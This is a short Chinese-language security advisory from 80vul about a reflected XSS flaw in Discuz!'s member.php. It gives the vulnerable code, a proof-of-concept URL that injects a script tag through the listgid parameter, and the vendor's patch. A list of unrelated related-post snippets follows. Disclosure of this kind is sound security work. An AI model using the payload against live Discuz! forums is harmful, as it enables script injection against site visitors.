Discuz! member.php xss bug

author: 80vul-B
team:[url]http://www.80vul.com[/url]

一 分析

member.php代码:

if(!empty($listgid) && ($listgid == intval($_GET['listgid']))) {
    //这里用的等于[==]而不是全等[===]进行的比较,且$listgid并没有初始化:)
        $type = $adminid == 1 ? 'grouplist' : $type;
    } else {
        $listgid = '';
    }
    ...
    $multipage = multi($num, $memberperpage, $page, "member.php?action=list&listgid=$listgid&srchmem=".rawurlencode($srchmem)."&order=$order&type=$type", $membermaxpages);

二 利用

poc:

poc:
[url]http://www.80vul.com/bbs/member.php?action=list&listgid=%22%3E%3Cscript%3Ealert[/url](/xss/)%3C/script%3E
会员列表页面存在分页时触发

三 补丁[fix]

刚发布的dz7 bt版本[1]已经fix这个漏洞了:

if(!empty($listgid) && ($listgid = intval($_GET['listgid']))) {
        $type = $adminid == 1 ? 'grouplist' : $type;
    } else {
        $listgid = '';
    }

[1]:[url]http://download.comsenz.com/Discuz/7.0.0Beta/Discuz_7_Beta_SC_GBK.zip[/url]

Discuz! member.php xss bug相关推荐

  1. Discuz member模块功能解析

    知识点 1.ip转换成地址 discuzip装换成地址用的是离线数据,一个叫纯真IP地址数据库的数据库,存放了几乎所有ip到地址的映射,且经常有更新,可以在这个git库上下载,也可以网上搜qqwry. ...

  2. Discuz学习总结——部分bug解决方案

    2019独角兽企业重金招聘Python工程师标准>>> 一开始安装discuz的时候,总会遇到一些问题,这里列举几个自己目前遇到的问题,进行排解 1.论坛首页css样式丢失 很多人一 ...

  3. $_server['php_self'] 漏洞,Discuz! $_SERVER['PHP_SELF'] XSS Vulnerability

    在common.inc.php文件的69行: $PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NA ...

  4. discuz member.php,Discuz启用Memberchach完美教程

    大致我们需要三步 1.在网站后台开启Memberchach并配置参数 2.修改网站配置文件config_global.php 3.配置Php环境使它支持Memberchach 下面我们开始动手 首先进 ...

  5. 反射型XSS漏洞详解

    反射型XSS漏洞 如果一个应用程序使用动态页面向用户显示错误消息,就会造成一种常见的XSS漏洞.通常,该页面会使用一个包含消息文本的参数,并在响应中将这个文 本返回给用户.对于开发者而言,使用这种机制 ...

  6. 《XSS跨站脚本攻击剖析与防御》—第6章6.1节参 考 文 献

    本节书摘来自异步社区<XSS跨站脚本攻击剖析与防御>一书中的第6章6.1节参 考 文 献,作者邱永华,更多章节内容可以访问云栖社区"异步社区"公众号查看. 参 考 文 ...

  7. xxs漏洞危害_反射型XSS漏洞详解

    反射型XSS漏洞 如果一个应用程序使用动态页面向用户显示错误消息,就会造成一种常见的XSS漏洞.通常,该页面会使用一个包含消息文本的参数,并在响应中将这个文 本返回给用户.对于开发者而言,使用这种机制 ...

  8. [PHP] 2018年终总结

    去掉敏感信息后的不完整版 ========================================================================== 2018年12月29日 ...

  9. PHP magic_quotes_gpc

    大多的PHP程序,都有这样的逻辑: 如果发现php.ini配置为不给GPC变量自动添加转义斜线,则PHP自动为GPC添加转义斜线 但是事实上,这是错误的,因为它改变了GPC变量原来的值. 有这个遗留习 ...

最新文章

  1. Twisted入门教程(3)
  2. MySQL—05—MySQL如何处理SQL语句;MySQL数据库存储引擎介绍;
  3. java超时导致oracle锁表_java – 正确的设计,以避免Oracle死锁?
  4. hibernate保存失败_Hibernate:保存与保存并保存或更新
  5. 【C语言进阶深度学习记录】二十九 main函数与命令行参数
  6. TensorFlow2.1正式版发布!最后一次支持Python2,进一步支持TPU
  7. 谈判失败:Oracle杀死Java EE
  8. 博弈论初步(SG函数)
  9. Atitit . 编程模型的变革总结
  10. 一元多项式的乘法与加法运算_如果加法变成【乘法】 , 那么什么能变成【加法】 ? ——记一则函数方程...
  11. 视频教程-通俗易懂的RPC框架Dubbo视频教程-Java
  12. 《统计自然语言处理》(宗成庆)学习笔记(一)
  13. php数据库 datetime转化时间错,分析php日期转时间戳
  14. 2021前端开发面试题:面试中该如何与HR谈薪资?
  15. 七脉轮位置_[转载]地球的七大脉轮位置
  16. 带K线的macd选股指标详解 优化MACD王牌指标 通达信macd选股指标源码
  17. 视频抽帧为图片和一系列图片转换为视频
  18. C++八股文分享---数据结构其二---哈希表
  19. 牛客 最小互质数(筛法求解)
  20. openfire html5,HTML5来了,7个混合式移动开发框架

热门文章

  1. android 顺序执行任务
  2. Standalone WSGI Containers
  3. 从零开始_学_数据结构(六)——排序(冒泡、插入、希尔、简单选择、归并、快速)...
  4. 简述RHEL7新特性(一)
  5. 使用Response.Redirect 两种方法打开一个新窗口
  6. 在oracle中怎么判断一个日期是否在一定时间范围内
  7. Repeater控件的使用
  8. 『Tarjan算法 无向图的双联通分量』
  9. Android 中文 API (90) —— WindowManager
  10. IntelliJ IDEA 环境常用设置整理